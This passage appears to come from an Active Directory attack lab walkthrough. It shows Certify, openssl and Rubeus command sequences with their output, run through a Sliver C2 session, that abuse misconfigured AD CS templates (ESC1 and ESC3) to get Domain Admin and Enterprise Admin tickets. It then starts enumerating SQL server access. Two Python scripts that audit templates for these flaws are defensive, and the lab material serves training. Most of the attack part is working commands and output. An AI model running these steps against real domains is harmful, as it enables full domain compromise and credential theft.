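            templates.append(current)
        if current is None:
            continue  # preamble before the first template
        m = re.match(r"\s*([^:]+?)\s*:\s*(.*)$", line)
        if m:
            last_key = m.group(1).lower()
            current[last_key] = [m.group(2).strip()]
        elif last_key is not None:
            current[last_key].append(line.strip())  # continuation of the previous field
    return templates

def principal_names(rights):
    """'dcorp\\RDPUsers   S-1-5-21-...-1116' -> 'rdpusers' (domain prefix and SID removed)."""
    return {re.split(r"\s+S-1-", r)[0].strip().split("\\")[-1].lower() for r in rights}

def esc1_check(template, extra_low_priv=()):
    """Evaluate the five ESC1 conditions; 'esc1' is True only when all of them hold."""
    low_priv = LOW_PRIV_PRINCIPALS | {g.lower() for g in extra_low_priv}
    name_flags = " ".join(template.get("mspki-certificates-name-flag", [])).upper()
    enroll_flags = " ".join(template.get("mspki-enrollment-flag", [])).upper()
    eku_text = " ".join(template.get("pkiextendedkeyusage", []))
    ekus = {e.strip().lower() for e in eku_text.split(",") if e.strip()}
    conditions = {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in name_flags,
        "authentication_eku": not ekus or bool(ekus & AUTH_EKUS),  # no EKU at all also qualifies
        "no_manager_approval": "PEND_ALL_REQUESTS" not in enroll_flags,
        "no_authorized_signatures": template.get("authorized signatures required", ["0"])[0] == "0",
        "low_priv_can_enroll": bool(principal_names(template.get("enrollment rights", [])) & low_priv),
    }
    conditions["esc1"] = all(conditions.values())
    conditions["template"] = template.get("template name", ["?"])[0]
    return conditions

def audit(text, extra_low_priv=()):
    """Return the ESC1 verdict for every template in a Certify 'find' dump."""
    return [esc1_check(t, extra_low_priv) for t in parse_certify_templates(text)]

# Constructed sample in the shape of Certify's output for the two templates seen in the lab.
SAMPLE_FIND_OUTPUT = r"""
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Agent
    Schema Version                        : 2
    msPKI-Certificates-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
    mspki-certificate-application-policy  : Certificate Request Agent
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-1874506631-3219952063-538504511-513

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-1874506631-3219952063-538504511-1116
                                      dcorp\Domain Admins           S-1-5-21-1874506631-3219952063-538504511-512
"""

if __name__ == "__main__":
    for result in audit(SAMPLE_FIND_OUTPUT, extra_low_priv=("RDPUsers",)):
        verdict = "ESC1" if result["esc1"] else "ok"
        failed = [k for k, v in result.items() if v is False]
        print(result["template"], verdict, "unmet:", failed)
```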

Let’s request a certificate for the Domain Admin - dcorp\Administrator using the request module in
certify.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\s
ystem32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp
-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altn
ame:administrator'

[*] certify output:

[*] Action: Request a Certificates


[*] Current user context : dcorp\studentX
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=studentX, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 65
[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA4//1KYY5YH56/uUB+Csy1ziMATrxMtGquZgXOaKOmWPRB0aN
OWhI3vrQWJ2pYl6KGx7t[.........snip......]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:16.8828228

Copy all the text between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it as esc1-DA.pem.

We need to convert esc1-DA.pem to PFX to use it. Spawn a new PowerShell prompt and use the openssl.exe binary on Windows to do that as follows. An export password is required; we use Passw0rd! as the export password in this case.
PS C:\AD\Tools> notepad C:\AD\Tools\esc1-DA.pem

PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!

Use the converted PFX from above with Rubeus to request a TGT for the DA, Administrator, as follows.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:administrator /certificate:C:\AD\Tools\esc1-DA.pfx /password:Passw0rd! /ptt'

[*] rubeus output:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=studentX, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[+] TGT request successful!

[*] base64(ticket.kirbi):

doIGWjCCBlagAwI[.........snip..........]

[+] Ticket successfully imported!


ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 10/9/2023 12:35:10 AM
EndTime : 10/9/2023 10:35:10 AM
RenewTill : 10/16/2023 12:35:10 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : zNy6GdgXubWSdZVS1CNP+g==
ASREP (key) : 20B8332220729E8DC58C6C69C8D8D053

Access the file system on dcorp-dc to check Administrator privileges.


[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.0 GiB)
==================================
drwxrwxrwx  $Recycle.Bin                        <dir>  Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx  $WinREAgent                         <dir>  Tue Jan 16 03:11:43 -0800 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B    Thu Nov 10 21:51:26 -0800 2022

[......snip....]

Purge all cached tickets using Rubeus.

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets


Luid: 0x0
[+] Tickets successfully purged!

We can use the same method to escalate to Enterprise Admin privileges. Request a certificate for the Enterprise Administrator, mcorp\Administrator.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator'

[*] certify output:


[*] Action: Request a Certificates
[*] Current user context : dcorp\studentX
[*] No subject name specified, using current context as subject.
[*] Template : HTTPSCertificates
[*] Subject : CN=studentX, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] AltName : moneycorp.local\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 67

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyFqI3oH[..........snip.........]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pf

Certify completed in 00:00:15.7018694

Save the certificate to esc1-EA.pem and convert it to a PFX using openssl as follows. We will use
Passw0rd! as the export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc1-EA.pem

PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-EA.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!

Use Rubeus to request a TGT for the Enterprise Administrator, mcorp\Administrator, using the PFX certificate created above.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:moneycorp.local\Administrator /dc:mcorp-dc.moneycorp.local /certificate:C:\AD\Tools\esc1-EA.pfx /password:Passw0rd! /ptt'

[*] rubeus output:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=studentX, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF/jCCBfqgAwIBB[......snip.....]

[+] Ticket successfully imported!

ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : MONEYCORP.LOCAL
StartTime : 10/9/2023 12:47:13 AM
EndTime : 10/9/2023 10:47:13 AM
RenewTill : 10/16/2024 12:47:13 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : BkP0F5pTDNuwuOLKxW/tvw==
ASREP (key) : 0DB3DAD44DF2FFD779B748D756E7E937

Finally, access the file system on mcorp-dc.


[server] sliver (dcorp-std_https) > ls '\\mcorp-dc.moneycorp.local\c$'

\\mcorp-dc.moneycorp.local\c$\ (14 items, 384.4 MiB)
====================================================
drwxrwxrwx  $Recycle.Bin                        <dir>  Fri Nov 11 06:35:22 -0800 2022
drwxrwxrwx  $WinREAgent                         <dir>  Tue Jan 16 03:07:58 -0800 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B    Thu Nov 10 21:51:26 -0800 2022

[......snip....]

Purge all cached tickets using Rubeus.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets


Luid: 0x0
[+] Tickets successfully purged!

Privilege Escalation to DA and EA using ESC3
Using Certify, Openssl and Rubeus
If we list vulnerable templates in moneycorp using Certify with the /vulnerable argument, we get the following result.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'find /vulnerable'

[*] certify output:

[*] Action: Find certificate templates


[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

Enterprise CA Name : moneycorp-MCORP-DC-CA


DNS Hostname : mcorp-dc.moneycorp.local
FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION,

[........snip.......]

[!] Vulnerable Certificates Templates :

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Agent
Schema Version : 2
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 0
pkiextendedkeyusage : Certificate Request Agent
mspki-certificate-application-policy : Certificate Request Agent
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-1874506631-3219952063-538504511-513
                    mcorp\Domain Admins S-1-5-21-280534878-1496970234-700767426-512

[........snip........]

Certify completed in 00:00:11.9550250

The SmartCardEnrollment-Agent template has the Certificate Request Agent EKU and grants enrollment rights to Domain Users. If we can find another template that has an EKU allowing domain authentication and requires the Certificate Request Agent application policy (an enrollment agent signature) on the request, we can request a certificate on behalf of any user.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' find

[*] certify output:


[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'
[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

[......snip......]

CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
Template Name : SmartCardEnrollment-Users
Schema Version : 2
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
mspki-enrollment-flag : AUTO_ENROLLMENT
Authorized Signatures Required : 1
Application Policies : Certificate Request Agent
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : dcorp\Domain Users S-1-5-21-1874506631-3219952063-538504511-513

[........snip........]
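Both the ESC1 template (HTTPSCertificates: enrollee supplies subject, authentication EKU, no manager approval or required signatures, enrollable by a low-privileged group) and the ESC3 pair (an enrollable Certificate Request Agent template plus a target template that requires an agent signature) can be picked out mechanically from Certify's find output. The Python script below is an added example, not part of the lab or of Certify: it parses a Certify-style listing (the embedded sample is constructed) and reports the templates an AD CS administrator should fix; the low-privileged group list and EKU names are assumptions for the example.

```python
import re

# Added example (not part of the lab or of Certify). Parses Certify-style
# "find" output and flags ESC1 / ESC3 template misconfigurations.
# Groups assumed to be low-privileged for this example.
LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers",
                   "everyone", "users", "rdpusers"}
# EKUs that let an issued certificate be used for domain authentication.
AUTH_EKUS = {"client authentication", "smart card logon",
             "pkinit client authentication", "any purpose"}
AGENT_EKU = "certificate request agent"

# Constructed listing in the same layout as the Certify output above.
SAMPLE_LISTING = r"""
    CA Name                        : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                  : HTTPSCertificates
    msPKI-Certificates-Name-Flag   : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag          : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required : 0
    pkiextendedkeyusage            : Client Authentication, Encrypting File System, Secure Email
        Enrollment Rights          : dcorp\RDPUsers        S-1-5-21-1874506631-3219952063-538504511-1116

    CA Name                        : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                  : SmartCardEnrollment-Agent
    msPKI-Certificates-Name-Flag   : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag          : AUTO_ENROLLMENT
    Authorized Signatures Required : 0
    pkiextendedkeyusage            : Certificate Request Agent
        Enrollment Rights          : dcorp\Domain Users    S-1-5-21-1874506631-3219952063-538504511-513
                                     mcorp\Domain Admins   S-1-5-21-280534878-1496970234-700767426-512

    CA Name                        : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                  : SmartCardEnrollment-Users
    msPKI-Certificates-Name-Flag   : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    Authorized Signatures Required : 1
    Application Policies           : Certificate Request Agent
    pkiextendedkeyusage            : Client Authentication, Encrypting File System, Secure Email
        Enrollment Rights          : dcorp\Domain Users    S-1-5-21-1874506631-3219952063-538504511-513
"""

KV_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 \-]*?)\s*:\s*(.*?)\s*$")
SID_RE = re.compile(r"^\s*(\S.*?)\s+(S-1-5-[\d-]+)\s*$")   # "<principal> <SID>"


def parse_templates(listing):
    """Return one dict per template; field names are lower-cased."""
    templates, current, in_rights = [], None, False
    for line in listing.splitlines():
        kv = KV_RE.match(line)
        if kv:
            key, value = kv.group(1).strip().lower(), kv.group(2)
            if key == "ca name":                 # every template record starts here
                current = {"enrollment rights": []}
                templates.append(current)
            if current is None:
                continue
            in_rights = key == "enrollment rights"
            if in_rights:
                sid = SID_RE.match(value)
                current["enrollment rights"].append(sid.group(1) if sid else value.strip())
            else:
                current[key] = value
        elif in_rights and current is not None:  # wrapped extra principals
            sid = SID_RE.match(line)
            if sid:
                current["enrollment rights"].append(sid.group(1))
    return templates


def _values(field):
    return {v.strip().lower() for v in field.split(",") if v.strip()}


def audit(templates):
    """Return (template name, finding, low-privileged enrollers) tuples."""
    findings = []
    for t in templates:
        name = t.get("template name", "?")
        ekus = _values(t.get("pkiextendedkeyusage", ""))
        name_flags = _values(t.get("mspki-certificates-name-flag", ""))
        app_policies = _values(t.get("application policies", ""))
        signatures = int(t.get("authorized signatures required", "0") or 0)
        # PEND_ALL_REQUESTS means a CA manager must approve each request.
        auto_issue = "pend_all_requests" not in _values(t.get("mspki-enrollment-flag", ""))
        weak = [p for p in t["enrollment rights"]
                if p.split("\\", 1)[-1].strip().lower() in LOW_PRIV_GROUPS]
        if not weak:
            continue
        if (auto_issue and signatures == 0 and ekus & AUTH_EKUS
                and "enrollee_supplies_subject" in name_flags):
            findings.append((name, "ESC1", weak))
        if auto_issue and signatures == 0 and AGENT_EKU in ekus:
            findings.append((name, "ESC3-agent", weak))
        if signatures >= 1 and AGENT_EKU in app_policies and ekus & AUTH_EKUS:
            findings.append((name, "ESC3-target", weak))
    return findings


if __name__ == "__main__":
    for name, issue, who in audit(parse_templates(SAMPLE_LISTING)):
        print(f"[!] {issue:<11} {name}: enrollable by {', '.join(who)}")
```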

Now that we have found such a template, request an Enrollment Agent certificate from the SmartCardEnrollment-Agent template.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent'

[*] certify output:

[*] Action: Request a Certificates

[*] Current user context : dcorp\studentX
[*] No subject name specified, using current context as subject.
[*] Template : SmartCardEnrollment-Agent
[*] Subject : CN=studentX, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 68

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAs+1Ez[.......snip......]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:15.8637877

As before, save the certificate text to esc3-agent.pem and convert it to PFX. Let’s keep using Passw0rd! as the export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc3-agent.pem

PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-agent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-agent.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!

Now we can use the Enrollment Agent certificate to request a certificate for the Domain Admin from the SmartCardEnrollment-Users template using Certify.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:Passw0rd!'

[*] certify output:

[*] Action: Request a Certificates


[*] Current user context : dcorp\studentX
[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : dcorp\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 69

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuML[......snip....]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:03.7778785

Once again, save the certificate text to esc3-DA.pem and convert the PEM to PFX. We continue to use Passw0rd! as the export password.
PS C:\AD\Tools> notepad C:\AD\Tools\esc3-DA.pem

PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-DA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-DA.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!

Use the esc3-DA.pfx created above with Rubeus to request a TGT for the Domain Administrator.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:administrator /certificate:C:\AD\Tools\esc3-DA.pfx /password:Passw0rd! /ptt'

[*] rubeus output:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[+] TGT request successful!

[*] base64(ticket.kirbi):

doIGWjCCBlagAwIBBaEDAgEW[.....snip.....]

[+] Ticket successfully imported!

ServiceName : krbtgt/dollarcorp.moneycorp.local
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 10/9/2023 1:08:44 AM
EndTime : 10/9/2023 11:08:44 AM
RenewTill : 10/16/2023 1:08:44 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 0vGBEfzzDLcecQ2sYK0Smg==
ASREP (key) : 8A64E06355F41C7C6D30737BD1F0885A

Access the file system on dcorp-dc to check Administrator privileges.


[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'

\\dcorp-dc\c$\ (15 items, 1.0 GiB)
==================================
drwxrwxrwx  $Recycle.Bin                        <dir>  Thu Dec 14 04:15:02 -0800 2023
drwxrwxrwx  $WinREAgent                         <dir>  Tue Jan 16 03:11:43 -0800 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B    Thu Nov 10 21:51:26 -0800 2022
[snip]

Purge all cached tickets using Rubeus.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets


Luid: 0x0
[+] Tickets successfully purged!

To escalate to Enterprise Admin, we only need to change the /onbehalfof value in the request to the SmartCardEnrollment-Users template and the target user in the Rubeus command. Note that we are using /onbehalfof:mcorp\administrator here.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Certify.exe' 'request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:C:\AD\Tools\esc3-agent.pfx /enrollcertpw:Passw0rd!'

[*] certify output:

[*] Action: Request a Certificates


[*] Current user context : dcorp\studentX
[*] Template : SmartCardEnrollment-Users
[*] On Behalf Of : mcorp\administrator
[*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 69

[*] cert.pem :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAuML[......snip....]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:03.7778785

Convert the PEM to esc3-EA.pfx using openssl.


PS C:\AD\Tools> notepad C:\AD\Tools\esc3-EA.pem

PS C:\AD\Tools> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc3-EA.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc3-EA.pfx
Enter Export Password: Passw0rd!
Verifying - Enter Export Password: Passw0rd!

Finally, use the PFX with Rubeus as above.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' 'asktgt /user:moneycorp.local\administrator /certificate:C:\AD\Tools\esc3-EA.pfx /dc:mcorp-dc.moneycorp.local /password:Passw0rd! /ptt'

[*] rubeus output:

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'

[+] TGT request successful!

[*] base64(ticket.kirbi):

doIF/jCCBfqgAwIBBaEDA[......snip.....]

[+] Ticket successfully imported!

ServiceName : krbtgt/moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : administrator
UserRealm : MONEYCORP.LOCAL
StartTime : 10/9/2022 1:16:40 AM
EndTime : 10/9/2022 11:16:40 AM
RenewTill : 10/16/2022 1:16:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 6IhY0zDJ2/Mvhs/UnfI86g==
ASREP (key) : 180E3F4012D7FAFAB6A1DE31F5460A5F

Finally, access the file system on mcorp-dc.


[server] sliver (dcorp-std_https) > ls '\\mcorp-dc.moneycorp.local\c$'

\\mcorp-dc.moneycorp.local\c$\ (14 items, 384.4 MiB)
====================================================
drwxrwxrwx  $Recycle.Bin                        <dir>  Fri Nov 11 06:35:22 -0800 2022
drwxrwxrwx  $WinREAgent                         <dir>  Tue Jan 16 03:07:58 -0800 2024
Lrw-rw-rw-  Documents and Settings -> C:\Users  0 B    Thu Nov 10 21:51:26 -0800 2022

[......snip....]

Purge all cached tickets using Rubeus.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p "C:\windows\system32\taskhostw.exe" -t 40 '/mnt/c/AD/Tools/Rubeus.exe' purge

[*] rubeus output:

[*] Action: Purge Tickets


Luid: 0x0
[+] Tickets successfully purged!

Learning Objective 22
Get a Sliver session on a SQL server in eurocorp forest by abusing database links from dcorp-mssql.

Enumerating SQL Server and Links


Using SharpSQL
Let’s start by enumerating SQL servers in the current domain and then check whether dcorp\studentX has privileges to connect to any of them. We can use SharpSQL to perform the enumeration.

SharpSQL is a C# implementation of PowerUpSQL and most of its modules and functions are similar.

Enumerate SQL servers in the domain using SharpSQL as follows.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-SQLInstanceDomain'

[*] Output:
[*] Get-SQLInstanceDomain:
MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
TERMSRV/DCORP-MSSQL
RestrictedKrbHost/DCORP-MSSQL
HOST/DCORP-MSSQL
MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local

Checking whether our current user, dcorp\studentX, has access to any of the instances, we find that we have access to dcorp-mssql only.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-UserPrivs -Instance dcorp-mssql.dollarcorp.moneycorp.local'
[*] Output:
[*] Authenticated to: dcorp-mssql.dollarcorp.moneycorp.local
[*] Get-UserPrivs:
CONNECT SQL
VIEW ANY DATABASE

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-UserPrivs -Instance dcorp-sql1.dollarcorp.moneycorp.local'
[*] Output:
[-] Authentication to: dcorp-sql1.dollarcorp.moneycorp.local failed

[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-UserPrivs -Instance dcorp-mgmt.dollarcorp.moneycorp.local'
[*] Output:
[-] Authentication to: dcorp-mgmt.dollarcorp.moneycorp.local failed

Enumerate sysadmins on the instance using the Get-Sysadmins module as follows.
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/SharpSQL.exe' 'Get-Sysadmins -Instance dcorp-mssql.dollarcorp.moneycorp.local'

[*] Output:
[*] Authenticated to: dcorp-mssql.dollarcorp.moneycorp.local
[*] Get-Sysadmins:
sa

